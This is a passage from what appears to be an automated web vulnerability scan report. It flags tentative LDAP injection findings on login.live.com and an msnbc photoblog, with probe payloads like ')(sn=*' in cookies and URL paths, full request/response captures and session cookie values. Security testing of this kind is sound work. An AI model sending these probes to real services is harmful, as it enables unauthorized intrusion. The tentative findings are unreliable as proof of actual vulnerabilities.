<a href="/members/MisterGoodcat.aspx" title="MisterGoodcat" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="MisterGoodcat" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/MisterGoodcat.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

...[SNIP]...

2.9. http://login.live.com/login.srf [MUID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The MUID cookie appears to be vulnerable to LDAP injection attacks.

The payloads 6d0cc50644fe129b)(sn=* and 6d0cc50644fe129b)!(sn=* were each submitted in the MUID cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=6d0cc50644fe129b)(sn=*; wla42=;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:49:13 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H41 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:48:13 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344953&id=64855&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-034b40c0-ec4a-47dc-9c86-914ce0846e13; path=/;version=1
X-Frame-Options: deny
Content-Length: 13617



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
ail.live.com/default.aspx";var srf_uSSL='https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&bk=85753670';var srf_uReg="https://signup.live.com/signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&bk=1296344953&cru=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26lc%3d1033%26id%3d64855%26mkt%3den-us";var srf_uFedConv="https://security.live.com/LoginStage.aspx?lmif=1000&ru=http://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1253879194%26rver%3D6.0.5285.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3D64855%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855";var srf_uPwRst="https://login.live.com/resetpw.srf?wreply=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1253879194%26rver%3d6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3d64855%26vv%3d900%26mkt%3dEN-US%26lc%3d1033&id=64855&mkt=EN-US&lc=1033";var srf_uAbout="http://login.live.com/gls.srf?urlID=WLAbout&mkt=EN-US&vv=900";var srf_uPrivacy="http://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=EN-US&vv=900";var srf_uHelp="http://login.live.com/gls.srf?urlID=WLHelpCentral&mkt=EN-US&vv=900";var srf_uFeedback="http://login.live.com/gls.srf?urlID=WLFeedback&mkt=EN-US&vv=900";var srf_uTerms="http://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=EN-US&vv=900";var srf_uLinkDisclaimer="";var srf_uPinRst="javascript:DoHelp(\'sdarc_tarms_tuoba\',\'\',\'1033\',\'DH_MSN,1033\',\'\',\'900\',\'&format=b1\');";var srf_uLogin = "http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&id=64855&vv=900&mkt=EN-US&lc=1033";var srf_uRDScript='http://Js.wlxrs.com/~Live.S
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:49:14 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H47 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:48:14 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344954&id=64855&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-9bd7d19f-73fe-4c55-955c-3a0205c96b76; path=/;version=1
X-Frame-Options: deny
Content-Length: 13602



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
ail.live.com/default.aspx";var srf_uSSL='https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&bk=85754168';var srf_uReg="https://signup.live.com/signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us&bk=1296344954&cru=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26lc%3d1033%26id%3d64855%26mkt%3den-us";var srf_uFedConv="https://security.live.com/LoginStage.aspx?lmif=1000&ru=http://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1253879194%26rver%3D6.0.5285.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3D64855%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855";var srf_uPwRst="https://login.live.com/resetpw.srf?wreply=http://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1253879194%26rver%3d6.0.5285.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3d64855%26vv%3d900%26mkt%3dEN-US%26lc%3d1033&id=64855&mkt=EN-US&lc=1033";var srf_uAbout="http://login.live.com/gls.srf?urlID=WLAbout&mkt=EN-US&vv=900";var srf_uPrivacy="http://login.live.com/gls.srf?urlID=MSNPrivacyStatement&mkt=EN-US&vv=900";var srf_uHelp="http://login.live.com/gls.srf?urlID=WLHelpCentral&mkt=EN-US&vv=900";var srf_uFeedback="http://login.live.com/gls.srf?urlID=WLFeedback&mkt=EN-US&vv=900";var srf_uTerms="http://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=EN-US&vv=900";var srf_uLinkDisclaimer="";var srf_uPinRst="javascript:DoHelp(\'sdarc_tarms_tuoba\',\'\',\'1033\',\'DH_MSN,1033\',\'\',\'900\',\'&format=b1\');";var srf_uLogin = "http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&id=64855&vv=900&mkt=EN-US&lc=1033";var srf_uRDScript='http://Js.wlxrs.com/~Live.S
...[SNIP]...

2.10. https://login.live.com/ppsecure/secure.srf [wla42 cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://login.live.com
Path:	/ppsecure/secure.srf

Issue detail

The wla42 cookie appears to be vulnerable to LDAP injection attacks.

The payloads d0b6de928a1638d)(sn=* and d0b6de928a1638d)!(sn=* were each submitted in the wla42 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&bk=1296343067 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=d0b6de928a1638d)(sn=*;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:34:02 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1I49 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:33:02 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344042&id=265631&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-2f091b46-7c65-4a52-bf38-2a5801acd6e1; path=/;version=1
X-Frame-Options: deny
Content-Length: 17632



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
et%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&wlsu=1&ru=https://login.silverlight.net/login/createuser.aspx%3freturnurl%3dhttp://www.silverlight.net/showcase/default.aspx&bk=1296344042&lm=I';var srf_uStUsr="https://login.live.com/ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&bk=1296344042";var g_urlNoCookies="https://login.live.com/cookiesDisabled.srf?mkt=EN-US&lc=1033";var srf_iForcedCT=0;var srf_sPhoneCodes = 'AR~Argentina~54~^[1-9]{1}[0-9]{10}$~9 343 555 1212~=1, =4, =7!!!AU~Australia~61~^[1-9]{1}[0-9]{8}$~499 123 456~=3, =6!!!BR~Brazil~55~^[1-9]{1}[0-9]{8,9}$~(11) 2345-6789~(=0,) =2,-=6!!!CA~Canada~1~^[1-9]{1}[0-9]{9}$~(604) 555-0100~(=0,) =3,-=6!!!CN~China~86~^1(3[0-9]{9}|[0-9]{10})$~136-8151-8185~-=3,-=7!!!CO~Colombia~57~^([1-9]{1}([0-9]{7}|[0-9]{9})|1[0-9]{10})$~3 315 012345~=1, =4!!!FR~France~33~^[1-9]{1}[0-9]{5,11}$~4 17 91 23 45 67~=1, =3, =5, =7, =9!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-9]{1}[0-9]{9}$~5XX 123 4567~=3, =6!!!UK~Uni
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:34:03 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1I56 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:33:03 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344043&id=265631&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-9ee37e4c-9b69-4e79-8f50-abc402e8ee8a; path=/;version=1
X-Frame-Options: deny
Content-Length: 17622



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
et%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&wlsu=1&ru=https://login.silverlight.net/login/createuser.aspx%3freturnurl%3dhttp://www.silverlight.net/showcase/default.aspx&bk=1296344043&lm=I';var srf_uStUsr="https://login.live.com/ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&wa=wsignin1.0&rpsnv=11&ct=1296343045&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fshowcase%2Fdefault.aspx&id=265631&vv=900&mkt=EN-US&lc=1033&bk=1296344043";var g_urlNoCookies="https://login.live.com/cookiesDisabled.srf?mkt=EN-US&lc=1033";var srf_iForcedCT=0;var srf_sPhoneCodes = 'AR~Argentina~54~^[1-9]{1}[0-9]{10}$~9 343 555 1212~=1, =4, =7!!!AU~Australia~61~^[1-9]{1}[0-9]{8}$~499 123 456~=3, =6!!!BR~Brazil~55~^[1-9]{1}[0-9]{8,9}$~(11) 2345-6789~(=0,) =2,-=6!!!CA~Canada~1~^[1-9]{1}[0-9]{9}$~(604) 555-0100~(=0,) =3,-=6!!!CN~China~86~^1(3[0-9]{9}|[0-9]{10})$~136-8151-8185~-=3,-=7!!!CO~Colombia~57~^([1-9]{1}([0-9]{7}|[0-9]{9})|1[0-9]{10})$~3 315 012345~=1, =4!!!FR~France~33~^[1-9]{1}[0-9]{5,11}$~4 17 91 23 45 67~=1, =3, =5, =7, =9!!!DE~Germany~49~^[1-9]{1}[0-9]{6,10}$~(1 70) 1 23 45 67~(=0, =1,) =3, =4, =6, =8!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!MX~Mexico~52~^[1-9]{1}[0-9]{8,9}$~(425) 555-0100~(=0,) =3,-=6!!!NL~Netherlands~31~^[1-9]{1}[0-9]{5,11}$~6 123 45678~=1, =4!!!ES~Spain~34~^[1-9]{1}[0-9]{5,10}$~609 123 456~=3, =6!!!TR~Turkey~90~^[1-9]{1}[0-9]{9}$~5XX 123 4567~=3, =6!!!UK~Uni
...[SNIP]...

2.11. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://photoblog.msnbc.redacted
Path:	/_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The REST URL parameter 4 appears to be vulnerable to LDAP injection attacks.

The payloads ad5b7d32bfbc5f43)(sn=* and ad5b7d32bfbc5f43)!(sn=* were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:51:17 GMT
Content-Length: 28340
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1476088023&do=msnbc.redacted&ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1476088023&do=msnbc.redacted&ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="htt
...[SNIP]...

Request 2

GET /_news/2011/01/ad5b7d32bfbc5f43)!(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sat, 29 Jan 2011 23:51:17 GMT
Content-Length: 28330
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=885699561&do=msnbc.redacted&ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=885699561&do=msnbc.redacted&ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="http:
...[SNIP]...

2.12. http://photoblog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://photoblog.msnbc.redacted
Path:	/_static/feeds/3147.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /_static/feeds/*)(sn=* HTTP/1.1
Host: photoblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:26:47 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 28622

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=547224798&do=msnbc.redacted&rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D%2A%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=547224798&do=msnbc.redacted&rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D%2A%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&ad=9:9:80;44::;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
